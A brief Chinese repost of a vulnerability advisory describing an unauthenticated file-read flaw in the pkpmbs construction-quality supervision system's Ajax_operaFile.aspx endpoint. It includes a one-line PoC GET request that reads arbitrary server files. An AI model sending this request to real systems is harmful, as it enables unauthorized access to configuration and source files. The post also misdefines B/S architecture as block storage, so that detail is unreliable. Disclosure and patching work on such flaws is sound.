本文共 495 字,大约阅读时间需要 1 分钟。
pkpmbs 建设工程质量监督系统是湖南建研信息技术股份开发的基于块状存储(B/S)架构的检测信息管理系统,专为工程质量检测管理与信息监管场景设计。该系统通过集成先进的信息监管技术,实现对工程质量数据的全流程管理与监督。
在系统的 Ajax_operaFile.aspx 接口中,存在文件读取漏洞。该漏洞未经身份认证的攻击者可利用,通过传递特定请求参数,绕过文件路径验证机制,读取系统内部配置文件或源码,导致信息泄露,严重影响系统安全。
为复现此漏洞,需在符合系统要求的环境中进行测试。建议使用支持 modernIE 插件的浏览器(如 IE 11 或类似工具)搭配对应版本的系统软件。
通过以下 PoC 验证:
GET /Applications/BaseInfos/System/Ajax_operaFile.aspx?method=readLocalFile&path=/Applications/BaseInfos/System/Ajax_operaFile.aspx HTTP/1.1
上述请求会触发漏洞,允许攻击者读取指定路径下的文件内容。
转载地址:http://xetfk.baihongyu.com/